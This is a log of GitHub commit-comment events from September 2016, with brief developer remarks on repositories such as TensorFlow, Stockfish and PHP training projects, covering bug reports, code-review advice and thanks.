{"id":"4612762089","type":"CommitCommentEvent","actor":{"login":"anka976"},"repo":{"name":"anka976/mugloar"},"payload":{"comment":{"id":19158801,"position":242,"line":234,"path":"src/main/java/mugloar/Application.java","commit_id":"6dbfad3a222459707247684c167ced690f41b258","created_at":"2016-09-24T16:08:31Z","updated_at":"2016-09-24T16:08:31Z","body":"epic magic :D"}},"created_at":"2016-09-24T16:08:31Z"}
{"id":"4612763277","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"kentcdodds/cross-env"},"payload":{"comment":{"id":19158802,"position":null,"line":null,"path":null,"commit_id":"f2275d53ff09b9a73f88fed3f79793f4e3e1f637","created_at":"2016-09-24T16:09:19Z","updated_at":"2016-09-24T16:09:19Z","body":":+1:"}},"created_at":"2016-09-24T16:09:19Z"}
{"id":"4612771273","type":"CommitCommentEvent","actor":{"login":"arundasan91"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":19158812,"position":null,"line":null,"path":null,"commit_id":"46248932c3b0e75c37ceacce0e34a5e5c84f5046","created_at":"2016-09-24T16:12:43Z","updated_at":"2016-09-24T16:12:43Z","body":"Could you please look into `download_dependencies.sh` again ?\r\n\r\nI am getting this error:\r\n\r\n```\r\nAruns-MacBook-Pro:tensorflow arundas$ tensorflow/contrib/makefile/download_dependencies.sh\r\ndownloading http://bitbucket.org/eigen/eigen/get/\" + eigen_version + \".tar.gz\r\ntar: Unrecognized archive format\r\ntar: Error exit delayed from previous errors.\r\n```\r\n\r\nThe old version of `download_dependencies.sh` worked fine."}},"created_at":"2016-09-24T16:12:43Z"}
{"id":"4612772325","type":"CommitCommentEvent","actor":{"login":"kentcdodds"},"repo":{"name":"kentcdodds/cross-env"},"payload":{"comment":{"id":19158814,"position":null,"line":null,"path":null,"commit_id":"f2275d53ff09b9a73f88fed3f79793f4e3e1f637","created_at":"2016-09-24T16:13:30Z","updated_at":"2016-09-24T16:13:30Z","body":"![4ad68cc50e9d3a06e378caa6a46077b7](https://cloud.githubusercontent.com/assets/1500684/18809677/7aaabbc0-823f-11e6-99f4-a35521fe4d4f.jpg)\r\n\r\n> 😆\r\n"}},"created_at":"2016-09-24T16:13:30Z"}
{"id":"4612775693","type":"CommitCommentEvent","actor":{"login":"arundasan91"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":19158823,"position":null,"line":null,"path":null,"commit_id":"65038b084059cf934df50fa86dba5b0e765f9d65","created_at":"2016-09-24T16:15:47Z","updated_at":"2016-09-24T16:15:47Z","body":"Could you please look into `download_dependencies.sh` again ?\r\n\r\nI am getting this error:\r\n\r\n```\r\nAruns-MacBook-Pro:tensorflow arundas$ tensorflow/contrib/makefile/download_dependencies.sh\r\ndownloading http://bitbucket.org/eigen/eigen/get/\" + eigen_version + \".tar.gz\r\ntar: Unrecognized archive format\r\ntar: Error exit delayed from previous errors.\r\n```\r\n\r\nThe old version of `download_dependencies.sh` worked fine."}},"created_at":"2016-09-24T16:15:47Z"}
{"id":"4612776889","type":"CommitCommentEvent","actor":{"login":"LeiXiaochen"},"repo":{"name":"LeiXiaochen/Code"},"payload":{"comment":{"id":19158827,"position":null,"line":null,"path":null,"commit_id":"432cc1b4b9c07860a78d4d0a80b5ccc6b077e5bf","created_at":"2016-09-24T16:16:34Z","updated_at":"2016-09-24T16:16:34Z","body":"陀螺仪"}},"created_at":"2016-09-24T16:16:34Z"}
{"id":"4612777278","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"grapherd/phonebook-1"},"payload":{"comment":{"id":19158828,"position":26,"line":33,"path":"phonebook_opt.h","commit_id":"4a9b75244ff8bcb2ab1c7822a37f4cf6e080f36a","created_at":"2016-09-24T16:16:51Z","updated_at":"2016-09-24T16:16:51Z","body":"You can propose the consistent changes over the style."}},"created_at":"2016-09-24T16:16:51Z"}
{"id":"4612778734","type":"CommitCommentEvent","actor":{"login":"loup99"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":19158832,"position":null,"line":null,"path":null,"commit_id":"8ae9db94b8d269ecf3cb1c90041389b739d92d25","created_at":"2016-09-24T16:17:54Z","updated_at":"2016-09-24T16:17:54Z","body":"I thought I had solved the conflicts, but thank you for resolving it."}},"created_at":"2016-09-24T16:17:54Z"}
{"id":"4612778792","type":"CommitCommentEvent","actor":{"login":"pandharepranali"},"repo":{"name":"pandharepranali/Fab-Fashion"},"payload":{"comment":{"id":19158833,"position":null,"line":null,"path":null,"commit_id":"47567ab54870576181353fc8e64c95084eb4c0e0","created_at":"2016-09-24T16:17:56Z","updated_at":"2016-09-24T16:17:56Z","body":"Hieee...\r\nI am Pranali."}},"created_at":"2016-09-24T16:17:56Z"}
{"id":"4612779991","type":"CommitCommentEvent","actor":{"login":"jfriestedt"},"repo":{"name":"appacademy/jump-start"},"payload":{"comment":{"id":19158835,"position":5,"line":27,"path":"jumpstart-files/practice_assessments/practice_assessment_1.rb","commit_id":"193b195ccbdb0097e7adcd7199cbee03c4583787","created_at":"2016-09-24T16:18:49Z","updated_at":"2016-09-24T16:18:49Z","body":"...How did that happen! Oops... unintended. Lol"}},"created_at":"2016-09-24T16:18:49Z"}
{"id":"4612781873","type":"CommitCommentEvent","actor":{"login":"sriman1998"},"repo":{"name":"vineethreddy2197/StudentKit"},"payload":{"comment":{"id":19158838,"position":null,"line":null,"path":null,"commit_id":"e50a887fb8d1e9747540e4f050204e7c14a891c2","created_at":"2016-09-24T16:20:09Z","updated_at":"2016-09-24T16:20:09Z","body":"Pikinav Thi !"}},"created_at":"2016-09-24T16:20:09Z"}
{"id":"4612782223","type":"CommitCommentEvent","actor":{"login":"outofambit"},"repo":{"name":"jquery/jquery-ui"},"payload":{"comment":{"id":19158839,"position":null,"line":null,"path":null,"commit_id":"f928f258b7978980a5f101b54f06778d14d219df","created_at":"2016-09-24T16:20:21Z","updated_at":"2016-09-24T16:20:21Z","body":"👍 "}},"created_at":"2016-09-24T16:20:21Z"}
{"id":"4612784023","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19158844,"position":null,"line":null,"path":null,"commit_id":"1aeb1a4f2ba3669ca007fab8a98ef2e18c22cc4b","created_at":"2016-09-24T16:21:30Z","updated_at":"2016-09-24T16:21:30Z","body":"Congrats!"}},"created_at":"2016-09-24T16:21:30Z"}
{"id":"4612784111","type":"CommitCommentEvent","actor":{"login":"Zhi-Ye"},"repo":{"name":"saulmm/Android-Material-Examples"},"payload":{"comment":{"id":19158845,"position":null,"line":null,"path":null,"commit_id":"ba9c2026bbe5fc57d6166389f60030176d065623","created_at":"2016-09-24T16:21:34Z","updated_at":"2016-09-24T16:21:34Z","body":"thanks"}},"created_at":"2016-09-24T16:21:34Z"}
{"id":"4612785303","type":"CommitCommentEvent","actor":{"login":"xuanbka1"},"repo":{"name":"xuanbka1/Alogrithm-and-Application"},"payload":{"comment":{"id":19158850,"position":null,"line":null,"path":null,"commit_id":"63b1208ad0632ceb373ebfa30276fbcb11053e71","created_at":"2016-09-24T16:22:22Z","updated_at":"2016-09-24T16:22:22Z","body":"đề bài: http://bkict.org/hustoj/problem/show/1012\r\n"}},"created_at":"2016-09-24T16:22:22Z"}
{"id":"4612785649","type":"CommitCommentEvent","actor":{"login":"grapherd"},"repo":{"name":"grapherd/phonebook-1"},"payload":{"comment":{"id":19158852,"position":26,"line":33,"path":"phonebook_opt.h","commit_id":"4a9b75244ff8bcb2ab1c7822a37f4cf6e080f36a","created_at":"2016-09-24T16:22:34Z","updated_at":"2016-09-24T16:22:34Z","body":"Fixed at 3f660bc.\r\n\r\nI'm not sure how to PR back when I change other part of my code..."}},"created_at":"2016-09-24T16:22:34Z"}
{"id":"4612787305","type":"CommitCommentEvent","actor":{"login":"sam217pa"},"repo":{"name":"noctuid/general.el"},"payload":{"comment":{"id":19158857,"position":null,"line":null,"path":null,"commit_id":"86a0c0e3c41036c7f525f89ad65590c7a97aaa61","created_at":"2016-09-24T16:23:40Z","updated_at":"2016-09-24T16:23:40Z","body":"It's awesome. I've just tested it, it eliminates the need to define redundant key-sequence for insert and normal states."}},"created_at":"2016-09-24T16:23:40Z"}
{"id":"4612787457","type":"CommitCommentEvent","actor":{"login":"ChessQuake"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19158859,"position":null,"line":null,"path":null,"commit_id":"1aeb1a4f2ba3669ca007fab8a98ef2e18c22cc4b","created_at":"2016-09-24T16:23:45Z","updated_at":"2016-09-24T16:23:45Z","body":"Congratulations !"}},"created_at":"2016-09-24T16:23:45Z"}
{"id":"4612795124","type":"CommitCommentEvent","actor":{"login":"NSkelsey"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":19158895,"position":7,"line":296,"path":"backend/globaleaks/db/sqlite.sql","commit_id":"d40c18d91a6d0bedc2a925261a16bb176e0ed970","created_at":"2016-09-24T16:28:49Z","updated_at":"2016-09-24T16:28:49Z","body":"This is a simplification in the boolean logic.\r\n\r\n```\r\n¬(¬A AND ¬B) = A OR B \r\n```"}},"created_at":"2016-09-24T16:28:49Z"}
{"id":"4612795955","type":"CommitCommentEvent","actor":{"login":"popolihu123"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19158904,"position":null,"line":null,"path":null,"commit_id":"5b519ed6791ff0ba43efc12ec338b9a5aec47f5f","created_at":"2016-09-24T16:29:26Z","updated_at":"2016-09-24T16:29:26Z","body":"同问"}},"created_at":"2016-09-24T16:29:26Z"}
{"id":"4612796038","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19158905,"position":22,"line":22,"path":"issue11-2/update-delete.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-24T16:29:31Z","updated_at":"2016-09-24T16:29:31Z","body":"最後のものだけに限っていいますと\r\n順序の問題と `id` をバインドしていないのが問題かと思いますよ〜。\r\n```\r\n// SQL文を変数に代入。$pdo->prepare(\"UPDATE topics SET name=:nameafter WHERE id=:id\"); このように書くのと同じこと。\r\n$sql = \"UPDATE topics SET name=:nameafter WHERE id=:id\"\r\n\r\n// 文を実行する準備を行う。\r\n$stmt = $pdo->prepare($sql);\r\n\r\n// パラメーターにバインド (もちろん idも行わなければならない。)\r\nコードは略\r\n// execute でSQL文実行\r\nコードは略\r\n```\r\n\r\n全て書くと答えになってしまうので一部省略しました。"}},"created_at":"2016-09-24T16:29:31Z"}
{"id":"4612797172","type":"CommitCommentEvent","actor":{"login":"sucklifex"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19158911,"position":null,"line":null,"path":null,"commit_id":"c4865fe63ee4bb9d401d09cb9543acaf9c853b56","created_at":"2016-09-24T16:30:16Z","updated_at":"2016-09-24T16:30:16Z","body":"awesome"}},"created_at":"2016-09-24T16:30:16Z"}
{"id":"4612797351","type":"CommitCommentEvent","actor":{"login":"emanuele6"},"repo":{"name":"porelbarranco/Rainbow-Poem"},"payload":{"comment":{"id":19158913,"position":null,"line":null,"path":null,"commit_id":"af288ce2448640949bc48290b6382479444217df","created_at":"2016-09-24T16:30:22Z","updated_at":"2016-09-24T16:30:22Z","body":"This cannot be merged cause it is gonna remove the original (english) poem."}},"created_at":"2016-09-24T16:30:22Z"}
{"id":"4612797872","type":"CommitCommentEvent","actor":{"login":"saquibamin"},"repo":{"name":"saquibamin/first-repository"},"payload":{"comment":{"id":19158916,"position":null,"line":null,"path":null,"commit_id":"fa9423d4f5607a5e2368bb53952a628be21f7fc2","created_at":"2016-09-24T16:30:42Z","updated_at":"2016-09-24T16:30:42Z","body":"Comment"}},"created_at":"2016-09-24T16:30:42Z"}
{"id":"4612799355","type":"CommitCommentEvent","actor":{"login":"DevRival"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":19158921,"position":null,"line":null,"path":null,"commit_id":"9076dde4e02082e4d2c801cfc22c33041138be5a","created_at":"2016-09-24T16:31:50Z","updated_at":"2016-09-24T16:31:50Z","body":"Fix tabs."}},"created_at":"2016-09-24T16:31:50Z"}
{"id":"4612804319","type":"CommitCommentEvent","actor":{"login":"iwean"},"repo":{"name":"5andr0/PogoLocationFeeder"},"payload":{"comment":{"id":19158941,"position":null,"line":null,"path":null,"commit_id":"11de3885715a9fc3fa16b9c0d41c5d688c9a69be","created_at":"2016-09-24T16:35:12Z","updated_at":"2016-09-24T16:35:12Z","body":"Thx :+1: "}},"created_at":"2016-09-24T16:35:12Z"}
{"id":"4612817902","type":"CommitCommentEvent","actor":{"login":"melissajstudent"},"repo":{"name":"melissajstudent/koth"},"payload":{"comment":{"id":19158995,"position":null,"line":null,"path":null,"commit_id":"68841f9b26d355d7d9b6adb4a8b31086d84ea80f","created_at":"2016-09-24T16:44:14Z","updated_at":"2016-09-24T16:44:14Z","body":"@wonderwoman13 This commit did not resolve my issue. Wondering if you've run across this before.\r\n\r\nBasically, Rails Admin looks wonderful locally but when I push to production, all styling is gone.\r\n<img width=\"503\" alt=\"screen shot 2016-09-24 at 11 42 24 am\" src=\"https://cloud.githubusercontent.com/assets/9088480/18809824/0d01596e-824c-11e6-9483-5881e6d97ab8.png\">\r\n"}},"created_at":"2016-09-24T16:44:14Z"}
{"id":"4612819504","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"StonedOSP/frameworks_base"},"payload":{"comment":{"id":19159003,"position":null,"line":null,"path":null,"commit_id":"707e70d06d951380290e9c751402b6e0ea3f3385","created_at":"2016-09-24T16:45:15Z","updated_at":"2016-09-24T16:45:15Z","body":"And you expected us to be remotely related to you with this immaturity still raging"}},"created_at":"2016-09-24T16:45:15Z"}
{"id":"4612824684","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19159015,"position":44,"line":41,"path":"issue18/login.php","commit_id":"df1870cffc8c2485d010c23815a4261ceb1ceab1","created_at":"2016-09-24T16:48:36Z","updated_at":"2016-09-24T16:48:36Z","body":"http://php.net/manual/ja/function.password-verify.php\r\n\r\nここを見るとpassword_verifyは第一引数に文字列、第二引数にハッシュ文字列を入れることになっています。\r\nですので、以下の形にするとうまくいくかと思います。\r\n```\r\npassword_verify('password', `passwordをハッシュ化したもの`)\r\n```\r\n一旦パスワードのハッシュ化(暗号化)は除外して考えるとイコールで結ぶのが良いかと思いました。\r\n\r\nあとはサインアップ時にパスワードをハッシュ化してデータベースに登録し、ログイン時にpassword_verifyを使う流れになるかと思います。"}},"created_at":"2016-09-24T16:48:36Z"}
{"id":"4612824963","type":"CommitCommentEvent","actor":{"login":"aleksandrserbin"},"repo":{"name":"omamnamore/omamnamore.github.io"},"payload":{"comment":{"id":19159017,"position":13,"line":10,"path":"web2.0/file-change-css.css","commit_id":"767f658ab247379e36611b377711cf04a8326ce8","created_at":"2016-09-24T16:48:46Z","updated_at":"2016-09-24T16:48:46Z","body":"file formatting"}},"created_at":"2016-09-24T16:48:46Z"}
{"id":"4612826966","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19159025,"position":null,"line":null,"path":null,"commit_id":"9451be3af8974f2b059719b4e6f03b9533446a1e","created_at":"2016-09-24T16:49:57Z","updated_at":"2016-09-24T16:49:57Z","body":"@snicolet yes you are right. \r\n\r\nI induced luca brivio in error too apparently...\r\nIt was fixed in my 2nd attempt in September 2015 http://tests.stockfishchess.org/tests/view/55ff02af0ebc5976a2d6df28\r\n\r\nHowever look at this...maybe I induced you in error also, back in October 2015\r\nhttps://github.com/snicolet/Stockfish/commit/3bf515c975a2df919498a037b95a8dafee855d24\r\n\r\nSorry about this !"}},"created_at":"2016-09-24T16:49:57Z"}
{"id":"4612827052","type":"CommitCommentEvent","actor":{"login":"jeifour"},"repo":{"name":"Jisho-org/jisho-notes"},"payload":{"comment":{"id":19159026,"position":7,"line":7,"path":"README.md","commit_id":"a7fc9c8c842109f35e4b49ef2666f55b38dff791","created_at":"2016-09-24T16:50:00Z","updated_at":"2016-09-24T16:50:00Z","body":"Can they have a separate title from the list of search words? It seems like this feature is not used in any of the current database entries. What is the purpose of the title? Just internal structuring or will it get rendered on the webpage? Should it be used at all and if yes, how would the formatting look like?"}},"created_at":"2016-09-24T16:50:00Z"}
{"id":"4612827155","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19159027,"position":35,"line":35,"path":"issue18/regist.php","commit_id":"df1870cffc8c2485d010c23815a4261ceb1ceab1","created_at":"2016-09-24T16:50:04Z","updated_at":"2016-09-24T16:50:04Z","body":"`$stmt->bindParam(':timestamp', $comment, PDO::PARAM_STR);`\r\nここがおかしいかも？"}},"created_at":"2016-09-24T16:50:04Z"}
{"id":"4612828284","type":"CommitCommentEvent","actor":{"login":"quinton-hoole"},"repo":{"name":"kubernetes/kubernetes"},"payload":{"comment":{"id":19159029,"position":null,"line":null,"path":null,"commit_id":"46c36fc04f8cdbf1256b3ba8895de28d30553200","created_at":"2016-09-24T16:50:45Z","updated_at":"2016-09-24T16:50:45Z","body":"@fmeng fyi"}},"created_at":"2016-09-24T16:50:45Z"}
{"id":"4612829995","type":"CommitCommentEvent","actor":{"login":"JoiNNN"},"repo":{"name":"jshackles/Enhanced_Steam"},"payload":{"comment":{"id":19159036,"position":null,"line":null,"path":null,"commit_id":"3d1c4be08dcd321d750ec55e10bf53ecab29503a","created_at":"2016-09-24T16:51:58Z","updated_at":"2016-09-24T16:51:58Z","body":"Hi @jshackles , I like where you are going with this, is very useful. I'd like to pitch in and letting you know that the code and the whole process can be simplified by following the same method (more or less) I used for [add_wishlist_discount_sort()](https://github.com/jshackles/Enhanced_Steam/blob/master/enhancedsteam.js#L1367).\r\n\r\nMost importantly this method doesn't require you to explicitly create and store the elements into an array to be sorted and then reinserted, also the function doing the actual sorting is abstracted making easier to reuse and you can manipulate the data by which the rows are sorted to make sure everything goes as expected.\r\n\r\nIf you don't have the time for it I'd be happy to give it a shot once you are done, to make sure I don't miss anything.\r\n\r\nGood job nonetheless 👍 !"}},"created_at":"2016-09-24T16:51:58Z"}
{"id":"4612831524","type":"CommitCommentEvent","actor":{"login":"djb77"},"repo":{"name":"djb77/tgpkernel-s7-tw601"},"payload":{"comment":{"id":19159039,"position":null,"line":null,"path":null,"commit_id":"1bb4e6f8a3a923bd3d84f39f4d3460777f16ca56","created_at":"2016-09-24T16:52:59Z","updated_at":"2016-09-24T16:52:59Z","body":"Revert \"regmap: Fix regmap_bulk_read in BE mode\"\r\n\r\nThis introduces excessive CPU cycle wastes on arizona IRQ,\r\ndon't know why.\r\n\r\nSigned-off-by: Park Ju Hyung <qkrwngud825@gmail.com>"}},"created_at":"2016-09-24T16:52:59Z"}
{"id":"4612834303","type":"CommitCommentEvent","actor":{"login":"tjc12821"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":19159048,"position":null,"line":null,"path":null,"commit_id":"3ba9d756736031f8de57a8dfb8368d221173bce6","created_at":"2016-09-24T16:54:57Z","updated_at":"2016-09-24T16:54:57Z","body":"Only modified the scaling for elemental mastery, possible that it also affects the % damage, or both."}},"created_at":"2016-09-24T16:54:57Z"}
{"id":"4612834495","type":"CommitCommentEvent","actor":{"login":"lt"},"repo":{"name":"saileshdev/central-authentication-service"},"payload":{"comment":{"id":19159050,"position":null,"line":null,"path":null,"commit_id":"184bdd67827c61f54785fea35cafda902b2a0a17","created_at":"2016-09-24T16:55:05Z","updated_at":"2016-09-24T16:55:05Z","body":"But I'm not a login ticket :("}},"created_at":"2016-09-24T16:55:05Z"}
{"id":"4612835264","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19159051,"position":35,"line":35,"path":"issue18/regist.php","commit_id":"df1870cffc8c2485d010c23815a4261ceb1ceab1","created_at":"2016-09-24T16:55:32Z","updated_at":"2016-09-24T16:55:32Z","body":"ここあたりできればデバックや実験しながら進んでほしいです！\r\n例えば`:timestamp` 部分を削り、\r\n```\r\n$stmt = $pdo -> prepare(\"INSERT INTO users (name, mail, password, created_at) VALUES (:name, :mail, :password)\");\r\n\r\n$stmt->bindParam(':name', $name, PDO::PARAM_STR);\r\n$stmt->bindParam(':mail', $mail, PDO::PARAM_STR);\r\n$stmt->bindParam(':password', $password, PDO::PARAM_STR);\r\n```\r\nだとうまくいくのかなど。\r\n"}},"created_at":"2016-09-24T16:55:32Z"}
{"id":"4612838717","type":"CommitCommentEvent","actor":{"login":"duduvp"},"repo":{"name":"duduvp/fatec-face-v4"},"payload":{"comment":{"id":19159057,"position":96,"line":105,"path":"modelo/usuarios.php","commit_id":"6091d22ae4449720c1744ab539dd415bae789623","created_at":"2016-09-24T16:57:58Z","updated_at":"2016-09-24T16:57:58Z","body":"Obrigado professor. Realizei essa correção no seguinte commit: https://github.com/duduvp/fatec-face-v4/commit/3e55a94270a7576b8f7b0bef2dcbb39eee759a41"}},"created_at":"2016-09-24T16:57:58Z"}
{"id":"4612839789","type":"CommitCommentEvent","actor":{"login":"wonderwoman13"},"repo":{"name":"melissajstudent/koth"},"payload":{"comment":{"id":19159060,"position":null,"line":null,"path":null,"commit_id":"68841f9b26d355d7d9b6adb4a8b31086d84ea80f","created_at":"2016-09-24T16:58:43Z","updated_at":"2016-09-24T16:58:43Z","body":"@melissajstudent I have not had that issue before but the best thing to do to troubleshoot this issue is to run your Rails app locally in production (something most developers forget that they can do this!)\r\n\r\nRAILS_ENV=production bundle exec bundle install\r\nRAILS_ENV=production rake db:setup\r\nrake secret (paste this key into your application.yml as SECRET_KEY_BASE)\r\nRAILS_ENV=production rake assets:precompile\r\nRAILS_ENV=production rails s"}},"created_at":"2016-09-24T16:58:43Z"}
{"id":"4612840342","type":"CommitCommentEvent","actor":{"login":"chencglt"},"repo":{"name":"chencglt/test"},"payload":{"comment":{"id":19159062,"position":null,"line":null,"path":null,"commit_id":"4f419f8ec65dc47c6feb0aa7a818b6e4ea60112b","created_at":"2016-09-24T16:59:08Z","updated_at":"2016-09-24T16:59:08Z","body":"很好"}},"created_at":"2016-09-24T16:59:08Z"}
{"id":"4612841625","type":"CommitCommentEvent","actor":{"login":"duduvp"},"repo":{"name":"duduvp/fatec-face-v4"},"payload":{"comment":{"id":19159070,"position":123,"line":132,"path":"modelo/usuarios.php","commit_id":"6091d22ae4449720c1744ab539dd415bae789623","created_at":"2016-09-24T16:59:57Z","updated_at":"2016-09-24T16:59:57Z","body":"Obrigado pela correção professor. Realizei as alterações nesse commit: https://github.com/duduvp/fatec-face-v4/commit/3e55a94270a7576b8f7b0bef2dcbb39eee759a41"}},"created_at":"2016-09-24T16:59:57Z"}
{"id":"4612843158","type":"CommitCommentEvent","actor":{"login":"SushiWoW"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":19159074,"position":null,"line":null,"path":null,"commit_id":"39390546ea214ce942708a109d6aac528089e8f5","created_at":"2016-09-24T17:00:46Z","updated_at":"2016-09-24T17:00:46Z","body":"please no bully :ok_hand:"}},"created_at":"2016-09-24T17:00:46Z"}
{"id":"4612844401","type":"CommitCommentEvent","actor":{"login":"duduvp"},"repo":{"name":"duduvp/fatec-face-v4"},"payload":{"comment":{"id":19159078,"position":86,"line":46,"path":"paginas/perfil.php","commit_id":"6091d22ae4449720c1744ab539dd415bae789623","created_at":"2016-09-24T17:01:34Z","updated_at":"2016-09-24T17:01:34Z","body":"Boa tarde professor @diogoko! Realizei essa validação no seguinte commit: https://github.com/duduvp/fatec-face-v4/commit/fe46c13434f1dad72bdc724d495f8a7841999f6d"}},"created_at":"2016-09-24T17:01:34Z"}
{"id":"4612845907","type":"CommitCommentEvent","actor":{"login":"Kimtaro"},"repo":{"name":"Jisho-org/jisho-notes"},"payload":{"comment":{"id":19159084,"position":7,"line":7,"path":"README.md","commit_id":"a7fc9c8c842109f35e4b49ef2666f55b38dff791","created_at":"2016-09-24T17:02:31Z","updated_at":"2016-09-24T17:02:31Z","body":"The title is currently not displayed on the site so it can be ignored.\r\n\r\nThe way my importer is coded the title would follow the # at the start of each entry. But yeah, all titles are blank at the moment :)"}},"created_at":"2016-09-24T17:02:31Z"}
{"id":"4612849048","type":"CommitCommentEvent","actor":{"login":"alorma"},"repo":{"name":"gitskarios/Gitskarios"},"payload":{"comment":{"id":19159092,"position":null,"line":null,"path":null,"commit_id":"bd1a915ba890b4ca4ab72302c46fd7c328efe1fa","created_at":"2016-09-24T17:04:33Z","updated_at":"2016-09-24T17:04:33Z","body":"@djcrapsody: i've been busy those days, i will generate the update tomorrow manually :)"}},"created_at":"2016-09-24T17:04:33Z"}
{"id":"4612849966","type":"CommitCommentEvent","actor":{"login":"phil-lopreiato"},"repo":{"name":"the-blue-alliance/the-blue-alliance"},"payload":{"comment":{"id":19159096,"position":null,"line":null,"path":null,"commit_id":"9901cc9ee74916e2a551928f1f036dd679801d49","created_at":"2016-09-24T17:05:14Z","updated_at":"2016-09-24T17:05:14Z","body":"@nwalters512 I'm not sure how to fix this for gd2"}},"created_at":"2016-09-24T17:05:14Z"}
{"id":"4612850903","type":"CommitCommentEvent","actor":{"login":"techstalgist"},"repo":{"name":"techstalgist/foorumi"},"payload":{"comment":{"id":19159103,"position":30,"line":30,"path":"src/main/java/tikape/runko/database/AlueDao.java","commit_id":"5148af7ac0a69a066f93986e421482713500f7e6","created_at":"2016-09-24T17:05:54Z","updated_at":"2016-09-24T17:05:54Z","body":"not implemented yet"}},"created_at":"2016-09-24T17:05:54Z"}
{"id":"4612851210","type":"CommitCommentEvent","actor":{"login":"tilden"},"repo":{"name":"freakified/TimeStylePebble"},"payload":{"comment":{"id":19159104,"position":20,"line":262,"path":"src/c/sidebar.c","commit_id":"9eb6c018143fd301f5efd0a999d8b224bb3f290f","created_at":"2016-09-24T17:06:05Z","updated_at":"2016-09-24T17:06:05Z","body":"True"}},"created_at":"2016-09-24T17:06:05Z"}
{"id":"4612851413","type":"CommitCommentEvent","actor":{"login":"ifly53e"},"repo":{"name":"phrack/ShootOFF"},"payload":{"comment":{"id":19159105,"position":null,"line":null,"path":null,"commit_id":"90f535ec9513d9fe20eaacb7ef29efafbfc67da1","created_at":"2016-09-24T17:06:12Z","updated_at":"2016-09-24T17:06:12Z","body":"line 122 should be 32, right?"}},"created_at":"2016-09-24T17:06:12Z"}
{"id":"4612852711","type":"CommitCommentEvent","actor":{"login":"lucaro"},"repo":{"name":"silvanstich/cineast"},"payload":{"comment":{"id":19159109,"position":12,"line":12,"path":"src/org/vitrivr/cineast/explorative/Mathematics.java","commit_id":"a6b2b791eec9957a01c758e7ae91c4087c238aaf","created_at":"2016-09-24T17:07:03Z","updated_at":"2016-09-24T17:07:03Z","body":"I would break this up into three interfaces, one of which is already in the java API, the 'Comparable' interface. The other ones would be Distance< T > and CompactnessCalculator< T > or something along those lines... "}},"created_at":"2016-09-24T17:07:03Z"}
{"id":"4612853273","type":"CommitCommentEvent","actor":{"login":"DJCrapsody"},"repo":{"name":"gitskarios/Gitskarios"},"payload":{"comment":{"id":19159112,"position":null,"line":null,"path":null,"commit_id":"bd1a915ba890b4ca4ab72302c46fd7c328efe1fa","created_at":"2016-09-24T17:07:21Z","updated_at":"2016-09-24T17:07:21Z","body":"I've got accepted already (finally!) if it's on beta that'll be great "}},"created_at":"2016-09-24T17:07:21Z"}
{"id":"4612853362","type":"CommitCommentEvent","actor":{"login":"saileshdev"},"repo":{"name":"saileshdev/central-authentication-service"},"payload":{"comment":{"id":19159113,"position":null,"line":null,"path":null,"commit_id":"184bdd67827c61f54785fea35cafda902b2a0a17","created_at":"2016-09-24T17:07:25Z","updated_at":"2016-09-24T17:07:25Z","body":"@lt  good one :)"}},"created_at":"2016-09-24T17:07:25Z"}
{"id":"4612854363","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19159116,"position":22,"line":22,"path":"issue11-2/update-delete.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-24T17:08:06Z","updated_at":"2016-09-24T17:08:06Z","body":"福岡さんの失敗を拝見すると、例えば\r\n```\r\n// 変数($sql) に代入しているのに\r\n$sql = \"UPDATE topics SET name=:nameafter WHERE id=:id\"\r\n// $pdo->prepare($dbh); のように何故か `$dbh` という変数が登場している？\r\n$stmt = $pdo->prepare($dbh);\r\n```\r\nのような間違いがたまにある気がしております。\r\n\r\nこちら、書き間違いが原因で発生しているのか、理解に詰まっているなど他に原因があるのか\r\nどちらになりますでしょうか。\r\n後者の場合は何か効果的なアドバイスができればと思っています(返信は月曜日になるかもしれません)。"}},"created_at":"2016-09-24T17:08:06Z"}
{"id":"4612855960","type":"CommitCommentEvent","actor":{"login":"melissajstudent"},"repo":{"name":"melissajstudent/koth"},"payload":{"comment":{"id":19159121,"position":null,"line":null,"path":null,"commit_id":"68841f9b26d355d7d9b6adb4a8b31086d84ea80f","created_at":"2016-09-24T17:09:10Z","updated_at":"2016-09-24T17:09:10Z","body":"Awesome tip once again! So, what this proves is that this is a Heroku issue because everything loads correctly here also?"}},"created_at":"2016-09-24T17:09:10Z"}
